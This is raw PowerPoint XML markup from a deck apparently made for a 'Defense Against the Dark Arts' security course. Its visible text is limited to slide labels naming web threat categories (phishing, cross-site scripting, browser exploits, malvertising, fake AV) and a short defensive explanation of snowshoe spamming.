    <dgm:cxn modelId="{89700DF7-1E13-4DE9-A4F0-501FA7D70275}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{1ED6A8B8-F392-4C63-8C47-878265522373}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{24C2CEA4-FD68-424B-8824-05CE7027EFE4}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{4C826A31-6809-4265-AB8F-E6B7859E0644}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D84FE507-6F8D-49B2-8A1F-CA30AB16F145}" type="presParOf" srcId="{BDEEA822-5B65-4E00-86A6-9696EF77207C}" destId="{938E69DD-DA65-49A9-BD93-38ECB59A4FE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1AF98F-3E44-4584-A3F6-3D7C4FC985F6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/gear1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_4" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0264946B-43BD-4200-9CB3-C73EDC8119C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0E59599B-8C57-4E2F-B0C9-BE0716B7D80D}" type="parTrans" cxnId="{2E87B596-BF53-4A6B-A375-26DD21BE92EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F2917B0-103A-48EA-84F7-94C2E70E70F1}" type="sibTrans" cxnId="{2E87B596-BF53-4A6B-A375-26DD21BE92EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" type="pres">
      <dgm:prSet presAssocID="{BA1AF98F-3E44-4584-A3F6-3D7C4FC985F6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348233A-7786-428F-8930-6932185C92C8}" type="pres">
      <dgm:prSet presAssocID="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" presName="gear1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AADF43C4-E596-436A-A887-129A0DB07DB9}" type="pres">
      <dgm:prSet presAssocID="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" presName="gear1srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{879FBC21-27C7-40BA-8BED-3983EE3DA15B}" type="pres">
      <dgm:prSet presAssocID="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" presName="gear1dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B31934B1-4F6F-4997-A8DD-4376F869FE2A}" type="pres">
      <dgm:prSet presAssocID="{7F2917B0-103A-48EA-84F7-94C2E70E70F1}" presName="connector1" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6E82F218-6463-48D4-B698-BB21352FED49}" type="presOf" srcId="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" destId="{6348233A-7786-428F-8930-6932185C92C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{88E88639-5031-48FE-BC8E-9AFC1D1E8CBE}" type="presOf" srcId="{BA1AF98F-3E44-4584-A3F6-3D7C4FC985F6}" destId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{8B26BD59-2F17-4A2B-B192-92C3A19B083E}" type="presOf" srcId="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" destId="{AADF43C4-E596-436A-A887-129A0DB07DB9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{A2EB9679-78E4-4019-9CCC-41722F3C1C18}" type="presOf" srcId="{7F2917B0-103A-48EA-84F7-94C2E70E70F1}" destId="{B31934B1-4F6F-4997-A8DD-4376F869FE2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{FE018096-1CA0-47E6-A3F4-0DEBD9952F67}" type="presOf" srcId="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" destId="{879FBC21-27C7-40BA-8BED-3983EE3DA15B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{2E87B596-BF53-4A6B-A375-26DD21BE92EB}" srcId="{BA1AF98F-3E44-4584-A3F6-3D7C4FC985F6}" destId="{0264946B-43BD-4200-9CB3-C73EDC8119C1}" srcOrd="0" destOrd="0" parTransId="{0E59599B-8C57-4E2F-B0C9-BE0716B7D80D}" sibTransId="{7F2917B0-103A-48EA-84F7-94C2E70E70F1}"/>
    <dgm:cxn modelId="{C9A16358-C77C-495C-B012-AF921925D543}" type="presParOf" srcId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" destId="{6348233A-7786-428F-8930-6932185C92C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{B07B9B51-CDD1-488A-BFF2-D6B21E183CE1}" type="presParOf" srcId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" destId="{AADF43C4-E596-436A-A887-129A0DB07DB9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{65DB2108-978F-47C7-9A94-B0CEDCC8CEE2}" type="presParOf" srcId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" destId="{879FBC21-27C7-40BA-8BED-3983EE3DA15B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1"/>
    <dgm:cxn modelId="{5111624F-D26C-4D96-B8CA-FEBA6EE34BEA}" type="presParOf" srcId="{6B4F0750-BD37-4EFA-BDF7-2AC21C76A0D5}" destId="{B31934B1-4F6F-4997-A8DD-4376F869FE2A}" srcOrd="3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8079A-098B-46C6-8A0D-7B42B3065596}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3813" y="1497331"/>
          <a:ext cx="1795101" cy="692909"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst>
            <a:gd name="adj" fmla="val 4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B10DC-9D54-4B80-8C10-A7DD07308FE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="482507" y="1670559"/>
          <a:ext cx="1515863" cy="69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2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Stone Age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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Generic phishing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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Popup-based redirection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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Script-bombing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="502802" y="1690854"/>
        <a:ext cx="1475273" cy="652319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5698D94-45B0-497D-B446-AD09A61D641D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2054218" y="1497331"/>
          <a:ext cx="1795101" cy="692909"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst>
            <a:gd name="adj" fmla="val 40000"/>
          </a:avLst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87BF4-59B7-411F-839E-242C624086A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2532912" y="1670559"/>
          <a:ext cx="1515863" cy="69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2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Bronze Age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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Improved phishing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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Cross-site scripting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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Browser exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2553207" y="1690854"/>
        <a:ext cx="1475273" cy="652319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D369FCE2-F72D-4605-88EE-F27139726154}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4104623" y="1497331"/>
          <a:ext cx="1795101" cy="692909"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst>
            <a:gd name="adj" fmla="val 40000"/>
          </a:avLst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3A4E96-EA76-455A-B306-097368F63BAF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4583317" y="1670559"/>
          <a:ext cx="1515863" cy="69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2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Iron Age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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Spear phishing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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Plug-in exploit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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Customized browser exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4603612" y="1690854"/>
        <a:ext cx="1475273" cy="652319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2AF053C6-5151-4B84-BEB6-6072A5037075}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6155028" y="1497331"/>
          <a:ext cx="1795101" cy="692909"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst>
            <a:gd name="adj" fmla="val 4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9336F8-42EF-412A-B5A9-511619FAC596}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6633722" y="1670559"/>
          <a:ext cx="1515863" cy="69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2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Today and Beyond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>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>MitB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:endParaRP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tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>HTML5-based attacks.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>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Advanced spear phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6654017" y="1690854"/>
        <a:ext cx="1475273" cy="6523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0B5C39-C726-4DB7-8B93-30D294838425}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="4191000" cy="68297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De-obfuscated Content</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="906497" y="0"/>
        <a:ext cx="3284502" cy="682979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CDD37F9-9142-40F6-8788-02E1863C3184}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68297" y="68297"/>
          <a:ext cx="838200" cy="546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016F1-9ECF-4DCF-8D49-DEED54E24929}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="751277"/>
          <a:ext cx="4191000" cy="68297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JavaScript</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="906497" y="751277"/>
        <a:ext cx="3284502" cy="682979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4EF98E4F-51A1-4766-B0B9-366C439D3E24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68297" y="819574"/>
          <a:ext cx="838200" cy="546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B6773-B665-4004-B114-232BDB8F894F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1502554"/>
          <a:ext cx="4191000" cy="68297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HTML [DOM Tree]</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="906497" y="1502554"/>
        <a:ext cx="3284502" cy="682979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E47BA8CB-37A3-45B3-B06C-880C4A651ACF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68297" y="1570851"/>
          <a:ext cx="838200" cy="546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6000" b="-10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45CA8-4A6A-4AE4-B0BB-280153E2814D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2253831"/>
          <a:ext cx="4191000" cy="68297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HTML [Raw HTML]</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="906497" y="2253831"/>
        <a:ext cx="3284502" cy="682979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B0C8FEB7-A950-47BC-BA07-39E851073386}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68297" y="2322128"/>
          <a:ext cx="838200" cy="546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A665D-9500-4B02-9965-60093CCA0F2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3005108"/>
          <a:ext cx="4191000" cy="68297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HTTP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="906497" y="3005108"/>
        <a:ext cx="3284502" cy="682979"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B35B7DFF-CDFB-4296-84BC-B758F90E7C13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68297" y="3073405"/>
          <a:ext cx="838200" cy="5463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07C439-2BF6-47B4-921B-9B75CBBC3B79}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="118028" y="1736"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="118028" y="1736"/>
        <a:ext cx="1738163" cy="1042898"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7FC377EC-8A29-4658-B9B5-27097634DF6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2030008" y="1736"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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SEO Poisoning</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2030008" y="1736"/>
        <a:ext cx="1738163" cy="1042898"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{19484F48-520F-4EA8-BD1B-4F61F8822526}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="118028" y="1218450"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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Fake AV</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="118028" y="1218450"/>
        <a:ext cx="1738163" cy="1042898"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EADFF2E9-6D66-417F-94C4-F625B5FB8B15}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2030008" y="1218450"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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Social Media Link Insertion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2030008" y="1218450"/>
        <a:ext cx="1738163" cy="1042898"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1ED6A8B8-F392-4C63-8C47-878265522373}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="103358" y="2436901"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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Forum Link Insertion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="103358" y="2436901"/>
        <a:ext cx="1738163" cy="1042898"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{938E69DD-DA65-49A9-BD93-38ECB59A4FE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2030008" y="2435165"/>
          <a:ext cx="1738163" cy="1042898"/>
        </a:xfrm>
        <a:prstGeom prst="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Malvertising</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2030008" y="2435165"/>
        <a:ext cx="1738163" cy="10428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8233A-7786-428F-8930-6932185C92C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="263839" y="193711"/>
          <a:ext cx="426164" cy="426164"/>
        </a:xfrm>
        <a:prstGeom prst="gear9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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="349517" y="293538"/>
        <a:ext cx="254808" cy="219057"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B31934B1-4F6F-4997-A8DD-4376F869FE2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="237339" y="145070"/>
          <a:ext cx="524181" cy="524181"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 4878"/>
            <a:gd name="adj2" fmla="val 312630"/>
            <a:gd name="adj3" fmla="val 2562667"/>
            <a:gd name="adj4" fmla="val 16341081"/>
            <a:gd name="adj5" fmla="val 5691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97622-6677-4EED-B746-4A9B3473D2DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/23/19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EE01F-8C47-41E7-A336-DD2FB67B46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0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amhaus.org/news.lasso?article=641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7D4FD1-97C0-4CC6-BFE7-8554AA4E42E2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617037"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12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12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30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609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55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79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75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96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6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Snowshoe Spamming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a snowshoe spreads the load of a traveler across a wide area of snow, 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snowshoe spamming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technique used by spammers to spread spam output across many IPs and domains, in order to dilute reputation metrics and evade filters.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Snowshoers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many fictitious business names (DBA - Doing Business As), fake names and identities, and frequently changing postal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dropboxes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voicemail drops. Conversely, legitimate mailers try hard to build brand reputation based on a real business address, a known domain and a small, permanent, well-identified range of sending IPs.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Snowshoers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often use anonymized or unidentifiable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whois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records, whereas legitimate senders are proud to provide their bona fide identity.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showshoers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tunneled connections from their back-end spam cannon to the spam egress IP. The back-end IP address is not in the spam headers. ISPs, you are in a position to detect those back-end spam cannons by checking where traffic flows are coming from. Remember, the tunneled connection is not necessarily on port 25.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Spamhaus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always appreciates such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9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42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61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8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68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6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16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9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9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74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1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3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1784664" y="2140298"/>
            <a:ext cx="5807876" cy="1079365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:defRPr sz="3000" b="0" i="0" cap="all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FRANKLIN GOTHIC MEDIUM 30PT</a:t>
            </a:r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1787840" y="3238152"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="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Subtitle of Presentation Franklin Gothic Medium 16pt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709351" y="1929027"/>
            <a:ext cx="588319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1710724" y="3756455"/>
            <a:ext cx="588319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2" descr="Intel_McAfee_Security_hori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17" y="133350"/>
            <a:ext cx="1886084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0" y="4781550"/>
            <a:ext cx="139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1200" dirty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Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty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Against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty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Dark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty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Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="OSU Logo - Losage" hidden="1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78" y="133727"/>
            <a:ext cx="1387045" cy="1387045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="OSU Logo - Square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0" y="96579"/>
            <a:ext cx="1435100" cy="15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79057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163"/>
            <a:ext cx="6556672" cy="570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7072138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272" y="4665062"/>
            <a:ext cx="1194328" cy="38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0" y="4781550"/>
            <a:ext cx="13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mienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Defense  Against  the  Dark  Arts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1" y="4848225"/>
            <a:ext cx="160020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algn="ctr">
              <a:defRPr sz="800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Saturday, February 23, 2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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4854475"/>
            <a:ext cx="33655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>
              <a:defRPr sz="800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{659A5FE0-7283-4E23-82C6-1CCE5B0C965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OSU Logo - Losange" hidden="1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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244914" y="59531"/>
            <a:ext cx="990600" cy="741211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="OSU Logo - Square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01" y="66675"/>
            <a:ext cx="617599" cy="6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CalPoly Logo" descr="http://upload.wikimedia.org/wikipedia/en/thumb/d/d9/CalPoly_Seal.svg/2000px-CalPoly_Seal.svg.png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628" y="57150"/>
            <a:ext cx="655172" cy="6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0" y="4781550"/>
            <a:ext cx="13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Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Defense  Against  the  Dark  Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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476"/>
            <a:ext cx="1712899" cy="55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1249406" y="1131163"/>
            <a:ext cx="6693244" cy="1079365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:defRPr sz="3000" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="B71234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FRANKLIN GOTHIC MEDIUM 30PT</a:t>
            </a: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1249407" y="2174097"/>
            <a:ext cx="6700108" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="8E99A0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Subtitle of Presentation Franklin Gothic Medium 16pt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1105931" y="919893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 userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1105931" y="2712994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OSU Logo - Losange" hidden="1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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244914" y="59531"/>
            <a:ext cx="990600" cy="741211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="CalPoly Logo" descr="http://upload.wikimedia.org/wikipedia/en/thumb/d/d9/CalPoly_Seal.svg/2000px-CalPoly_Seal.svg.png" hidden="1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628" y="57150"/>
            <a:ext cx="655172" cy="6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SU Logo - Square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01" y="66675"/>
            <a:ext cx="617599" cy="6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79057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163"/>
            <a:ext cx="6556672" cy="570187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7072138" cy="3733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272" y="4665062"/>
            <a:ext cx="1194328" cy="38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0" y="4857750"/>
            <a:ext cx="304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Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Defense  Against  the  Dark  Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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4854475"/>
            <a:ext cx="33655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659A5FE0-7283-4E23-82C6-1CCE5B0C96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OSU Logo - Losange" hidden="1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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244914" y="59531"/>
            <a:ext cx="990600" cy="741211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="OSU Logo - Square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01" y="66675"/>
            <a:ext cx="617599" cy="6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CalPoly Logo" descr="http://upload.wikimedia.org/wikipedia/en/thumb/d/d9/CalPoly_Seal.svg/2000px-CalPoly_Seal.svg.png" hidden="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628" y="57150"/>
            <a:ext cx="655172" cy="6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715977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bg>
      <p:bgPr>
        <a:blipFill dpi="0"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0" y="4781550"/>
